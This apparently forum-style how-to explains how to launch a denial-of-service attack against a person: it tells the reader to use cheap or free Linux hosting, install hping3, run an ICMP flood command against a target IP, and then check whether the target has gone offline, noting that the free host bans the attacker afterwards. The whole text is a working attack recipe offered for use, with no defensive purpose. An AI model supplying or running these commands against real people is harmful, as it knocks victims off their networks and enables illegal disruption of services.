All you need is a cheap linux hosting service/free service such as koding (Koding bans instantly after launching ddos. Soit brings the person down by you get banned)

Open up terminal and make sure you have all updates
sudo apt-get update

Let that go through, then type in
sudo apt-get install hping3
In the download it will ask if you want to continue, type 'Y" and click enter

To DDoS a person type
'sudo hping3 -1 --flood IP'
The only thing you change is IP!

To see if the user is down or not go to
http://mailradar.com/dns-tools
and typ in the IP
